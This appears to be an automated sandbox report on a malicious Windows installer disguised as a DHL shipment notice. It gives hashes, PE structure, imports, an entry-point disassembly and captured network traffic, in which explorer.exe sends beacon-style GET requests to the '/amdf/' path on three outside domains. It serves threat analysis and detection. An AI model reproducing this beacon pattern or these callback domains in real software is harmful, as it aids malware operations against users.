                      SHA-512:054AD8E0CC4501E02E9FDA325A0DC0C6B0807E8D7C8331D6B0D04C31BC0F7D796E6651F1F006FD8020061886E0882FB8F953A9A1C84AB0D48F8B021654D7D116
                      Malicious:false
                      Reputation:low
                      Preview:*;......,................"..k....-......L:.......;..........................................................................................................................................................................................................................................G...............7...j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                      Entropy (8bit):7.915673728517711
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:DHL SHIPMENT NOTIFICATION 1146789443.exe
                      File size:278331
                      MD5:8fbdf9f70b21179d87b83fe47b2137dd
                      SHA1:146eebe16adad9486cac66f4574810cec1f56cbb
                      SHA256:972bc525f6be5f7281a72ec4887cc5b85f4b064463bba234f1258c967b164026
                      SHA512:4677bcdcaf115ff555b04d00db60fcd12a02be178a95e401bcbccf4130e347fcc315579fa72f7055f490009fcaf3bb4c14cc119432ff1b89756f6f6d5ec62abe
                      SSDEEP:6144:LOtIO6psx/OTz8giqoW/rOiY8FWB55z44pvVwVlTc7:LOL4sBOTYgjFyGcB5h9pcE
                      TLSH:A44412053A44D43BFD3722734E3766738E6E471442B94B1BB3E126257E719C2AB1EB81
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:....

                      File Icon

                      Icon Hash:b2a88c96b2ca6a72

                      Static PE Info

                      General

                      Entrypoint:0x403646
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Time Stamp:0x614F9AA9 [Sat Sep 25 21:54:49 2021 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:61259b55b8912888e90f516ca08dc514

                      Entrypoint Preview

                      Instruction
                      push ebp
                      mov ebp, esp
                      sub esp, 000003F4h
                      push ebx
                      push esi
                      push edi
                      push 00000020h
                      pop edi
                      xor ebx, ebx
                      push 00008001h
                      mov dword ptr [ebp-14h], ebx
                      mov dword ptr [ebp-04h], 0040A230h
                      mov dword ptr [ebp-10h], ebx
                      call dword ptr [004080C8h]
                      mov esi, dword ptr [004080CCh]
                      lea eax, dword ptr [ebp-00000140h]
                      push eax
                      mov dword ptr [ebp-0000012Ch], ebx
                      mov dword ptr [ebp-2Ch], ebx
                      mov dword ptr [ebp-28h], ebx
                      mov dword ptr [ebp-00000140h], 0000011Ch
                      call esi
                      test eax, eax
                      jne 00007F1EB8BBA36Ah
                      lea eax, dword ptr [ebp-00000140h]
                      mov dword ptr [ebp-00000140h], 00000114h
                      push eax
                      call esi
                      mov ax, word ptr [ebp-0000012Ch]
                      mov ecx, dword ptr [ebp-00000112h]
                      sub ax, 00000053h
                      add ecx, FFFFFFD0h
                      neg ax
                      sbb eax, eax
                      mov byte ptr [ebp-26h], 00000004h
                      not eax
                      and eax, ecx
                      mov word ptr [ebp-2Ch], ax
                      cmp dword ptr [ebp-0000013Ch], 0Ah
                      jnc 00007F1EB8BBA33Ah
                      and word ptr [ebp-00000132h], 0000h
                      mov eax, dword ptr [ebp-00000134h]
                      movzx ecx, byte ptr [ebp-00000138h]
                      mov dword ptr [007A8B58h], eax
                      xor eax, eax
                      mov ah, byte ptr [ebp-0000013Ch]
                      movzx eax, ax
                      or eax, ecx
                      xor ecx, ecx
                      mov ch, byte ptr [ebp-2Ch]
                      movzx ecx, cx
                      shl eax, 10h
                      or eax, ecx

                      Rich Headers

                      Programming Language:
                      • [EXP] VC++ 6.0 SP5 build 8804

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b90000xa50.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x67c40x6800False0.675180288462data6.49518266675IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rdata0x80000x139a0x1400False0.4498046875data5.14106681717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0xa0000x39ebb80x600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .ndata0x3a90000x100000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .rsrc0x3b90000xa500xc00False0.401692708333data4.18753619353IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_ICON0x3b91900x2e8dataEnglishUnited States
                      RT_DIALOG0x3b94780x100dataEnglishUnited States
                      RT_DIALOG0x3b95780x11cdataEnglishUnited States
                      RT_DIALOG0x3b96980x60dataEnglishUnited States
                      RT_GROUP_ICON0x3b96f80x14dataEnglishUnited States
                      RT_MANIFEST0x3b97100x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                      Imports

                      DLLImport
                      ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                      SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                      ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                      USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 13, 2022 16:10:37.252978086 CEST4977380192.168.2.4142.250.185.115
                      May 13, 2022 16:10:37.269717932 CEST8049773142.250.185.115192.168.2.4
                      May 13, 2022 16:10:37.269814014 CEST4977380192.168.2.4142.250.185.115
                      May 13, 2022 16:10:37.269937038 CEST4977380192.168.2.4142.250.185.115
                      May 13, 2022 16:10:37.286659002 CEST8049773142.250.185.115192.168.2.4
                      May 13, 2022 16:10:37.426731110 CEST8049773142.250.185.115192.168.2.4
                      May 13, 2022 16:10:37.426786900 CEST8049773142.250.185.115192.168.2.4
                      May 13, 2022 16:10:37.426815987 CEST8049773142.250.185.115192.168.2.4
                      May 13, 2022 16:10:37.426949978 CEST4977380192.168.2.4142.250.185.115
                      May 13, 2022 16:10:37.427006960 CEST4977380192.168.2.4142.250.185.115
                      May 13, 2022 16:10:37.428131104 CEST8049773142.250.185.115192.168.2.4
                      May 13, 2022 16:10:37.428225040 CEST8049773142.250.185.115192.168.2.4
                      May 13, 2022 16:10:37.428282976 CEST4977380192.168.2.4142.250.185.115
                      May 13, 2022 16:10:37.428313971 CEST4977380192.168.2.4142.250.185.115
                      May 13, 2022 16:10:57.716248035 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:10:57.733297110 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.733407974 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:10:57.733571053 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:10:57.750320911 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.795728922 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.795795918 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.795835972 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.795855999 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:10:57.795876026 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.795908928 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.795924902 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:10:57.795937061 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.795967102 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.796086073 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:10:57.796102047 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:10:57.796107054 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:10:57.812993050 CEST804977523.227.38.74192.168.2.4
                      May 13, 2022 16:10:57.813087940 CEST4977580192.168.2.423.227.38.74
                      May 13, 2022 16:11:20.068773985 CEST4977780192.168.2.43.64.163.50
                      May 13, 2022 16:11:20.088573933 CEST80497773.64.163.50192.168.2.4
                      May 13, 2022 16:11:20.088706017 CEST4977780192.168.2.43.64.163.50
                      May 13, 2022 16:11:20.088871002 CEST4977780192.168.2.43.64.163.50
                      May 13, 2022 16:11:20.108211994 CEST80497773.64.163.50192.168.2.4
                      May 13, 2022 16:11:20.108275890 CEST80497773.64.163.50192.168.2.4
                      May 13, 2022 16:11:20.108305931 CEST80497773.64.163.50192.168.2.4
                      May 13, 2022 16:11:20.108448982 CEST4977780192.168.2.43.64.163.50
                      May 13, 2022 16:11:20.108520031 CEST4977780192.168.2.43.64.163.50
                      May 13, 2022 16:11:20.127751112 CEST80497773.64.163.50192.168.2.4

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      May 13, 2022 16:10:37.212352991 CEST6064753192.168.2.48.8.8.8
                      May 13, 2022 16:10:37.247565985 CEST53606478.8.8.8192.168.2.4
                      May 13, 2022 16:10:57.684124947 CEST6490953192.168.2.48.8.8.8
                      May 13, 2022 16:10:57.714978933 CEST53649098.8.8.8192.168.2.4
                      May 13, 2022 16:11:20.044547081 CEST6038153192.168.2.48.8.8.8
                      May 13, 2022 16:11:20.067533016 CEST53603818.8.8.8192.168.2.4

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                      May 13, 2022 16:10:37.212352991 CEST192.168.2.48.8.8.80x190eStandard query (0)www.rtpholywin99.comA (IP address)IN (0x0001)
                      May 13, 2022 16:10:57.684124947 CEST192.168.2.48.8.8.80x2690Standard query (0)www.keilaniclothing.comA (IP address)IN (0x0001)
                      May 13, 2022 16:11:20.044547081 CEST192.168.2.48.8.8.80xdfdeStandard query (0)www.ultrakill.xyzA (IP address)IN (0x0001)

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                      May 13, 2022 16:10:37.247565985 CEST8.8.8.8192.168.2.40x190eNo error (0)www.rtpholywin99.comghs.google.comCNAME (Canonical name)IN (0x0001)
                      May 13, 2022 16:10:37.247565985 CEST8.8.8.8192.168.2.40x190eNo error (0)ghs.google.com142.250.185.115A (IP address)IN (0x0001)
                      May 13, 2022 16:10:57.714978933 CEST8.8.8.8192.168.2.40x2690No error (0)www.keilaniclothing.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                      May 13, 2022 16:10:57.714978933 CEST8.8.8.8192.168.2.40x2690No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                      May 13, 2022 16:11:20.067533016 CEST8.8.8.8192.168.2.40xdfdeNo error (0)www.ultrakill.xyz3.64.163.50A (IP address)IN (0x0001)

                      HTTP Request Dependency Graph

                      • www.rtpholywin99.com
                      • www.keilaniclothing.com
                      • www.ultrakill.xyz

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.449773142.250.185.11580C:\Windows\explorer.exe
                      TimestampkBytes transferredDirectionData
                      May 13, 2022 16:10:37.269937038 CEST9887OUTGET /amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx HTTP/1.1
                      Host: www.rtpholywin99.com
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
                      May 13, 2022 16:10:37.426731110 CEST9888INHTTP/1.1 404 Not Found
                      Content-Type: text/html; charset=UTF-8
                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                      Pragma: no-cache
                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                      Date: Fri, 13 May 2022 14:10:37 GMT
                      X-Content-Type-Options: nosniff
                      X-XSS-Protection: 1; mode=block
                      Server: GSE
                      Accept-Ranges: none
                      Vary: Accept-Encoding
                      Transfer-Encoding: chunked
                      Connection: close
                      Data Raw: 62 31 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 6c 6f 67 67 65 72 20 69 73 20 61 20 62 6c 6f 67 20 70 75 62 6c 69 73 68 69 6e 67 20 74 6f 6f 6c 20 66 72 6f 6d 20 47 6f 6f 67 6c 65 20 66 6f 72 20 65 61 73 69 6c 79 20 73 68 61 72 69 6e 67 20 79 6f 75 72 20 74 68 6f 75 67 68 74 73 20 77 69 74 68 20 74 68 65 20 77 6f 72 6c 64 2e 20 42 6c 6f 67 67 65 72 20 6d 61 6b 65 73 20 69 74 20 73 69 6d 70 6c 65 20 74 6f 20 70 6f 73 74 20 74 65 78 74 2c 20 70 68 6f 74 6f 73 20 61 6e 64 20 76 69 64 65 6f 20 6f 6e 74 6f 20 79 6f 75 72 20 70 65 72 73 6f 6e 61 6c 20 6f 72 20 74 65 61 6d 20 62 6c 6f 67 2e 22 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 6f 67 67 65 72 2c 20 62 6c 6f 67 73 70 6f 74 2c 20 62 6c 6f 67 2c 20 62 6c 6f 67 67 65 72 2e 63 6f 6d 2c 20 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2c 20 70 65 72 73 6f 6e 61 6c 20 62 6c 6f 67 2c 20 77 65 62 6c 6f 67 2c 20 63 72 65 61 74 65 20 62 6c 6f 67 2c 20 6e 65 77 20 62 6c 6f 67 22 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 23 68 6f 6d 65 42 75 74 74 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 32 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 76 31 2f 76 2d 63 73 73 2f 33 38 39 36 35 35 38 36 37 33 2d 6e 65 77 5f 75 69 5f 73 74 61 74 69 63 5f 70 61 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6c 61 6e 67 5f 65 6e 20 72 62 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 67 61 3d 77 69 6e 64 6f 77 2e 67 61 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 28 67 61 2e 71 3d 67 61 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72
                      Data Ascii: b12<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html dir="ltr"><head><meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta name="description" content="Blogger is a blog publishing tool from Google for easily sharing your thoughts with the world. Blogger makes it simple to post text, photos and video onto your personal or team blog."> <meta name="keywords" content="blogger, blogspot, blog, blogger.com, blogspot.com, personal blog, weblog, create blog, new blog"><base href="https://www.blogger.com"><title>Page not found</title><style type="text/css"> #homeButton { width: 270px; } </style><link href="https://www.blogger.com/static/v1/v-css/3896558673-new_ui_static_pages.css" rel="stylesheet" type="text/css"></head><body class="lang_en rb"><script type="text/javascript"> window.ga=window.ga||function(){(ga.q=ga.q||[]).push(ar
                      May 13, 2022 16:10:37.426786900 CEST9890INData Raw: 67 75 6d 65 6e 74 73 29 7d 3b 67 61 2e 6c 3d 2b 6e 65 77 20 44 61 74 65 3b 0a 20 20 20 20 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 0a 20 20 20 20 20 20 20 20 20 22 55 41 2d 31 38 30 30 33 2d 37 22 2c 0a 20 20 20 20 20 20 20 20 20 27 61 75 74 6f
                      Data Ascii: guments)};ga.l=+new Date; ga('create', "UA-18003-7", 'auto', { 'sampleRate': 0.1 }); ga('set', 'location', window.location.href.split(/[?#0-9]/)[0]); ga('set', 'anonymizeIp', true); ga('requir
                      May 13, 2022 16:10:37.426815987 CEST9890INData Raw: 6e 67 3e 0a 0a 3c 70 20 63 6c 61 73 73 3d 22 6e 65 78 74 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 72 74 70 68 6f 6c 79 77 69 6e 39 39 2e 63 6f 6d 2f 22 3e 47 6f 20 74 6f 20 62 6c 6f 67 20 68 6f 6d 65 70 61 67 65 3c 2f 61
                      Data Ascii: ng><p class="next"><a href="http://www.rtpholywin99.com/">Go to blog homepage</a></p></div></div></div></div><div id="footer"><a href="/go/helpcenter">Help Center</a><span class="spacer">|</span><a href="/go/terms">Terms of Service</a><s
                      May 13, 2022 16:10:37.428131104 CEST9891INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      1192.168.2.44977523.227.38.7480C:\Windows\explorer.exe
                      TimestampkBytes transferredDirectionData
                      May 13, 2022 16:10:57.733571053 CEST11587OUTGET /amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU HTTP/1.1
                      Host: www.keilaniclothing.com
                      Connection: close
                      Data Raw: 00 00 00 00 00 00 00
                      Data Ascii:
                      May 13, 2022 16:10:57.795728922 CEST11589INHTTP/1.1 403 Forbidden
                      Date: Fri, 13 May 2022 14:10:57 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      X-Sorting-Hat-PodId: 250
                      X-Sorting-Hat-ShopId: 64045383931
                      X-Dc: gcp-europe-west1
                      X-Request-ID: c795f513-2a89-4e29-a885-b65e0c1175bd
                      X-XSS-Protection: 1; mode=block
                      X-Download-Options: noopen
                      X-Content-Type-Options: nosniff
                      X-Permitted-Cross-Domain-Policies: none
                      CF-Cache-Status: DYNAMIC
                      Server: cloudflare
                      CF-RAY: 70abfb06ecb2917d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                      Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c
                      Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;al
                      May 13, 2022 16:10:57.795795918 CEST11590INData Raw: 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b 70 61 64 64 69 6e 67 3a 31 2e 32 72
                      Data Ascii: ign-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{borde
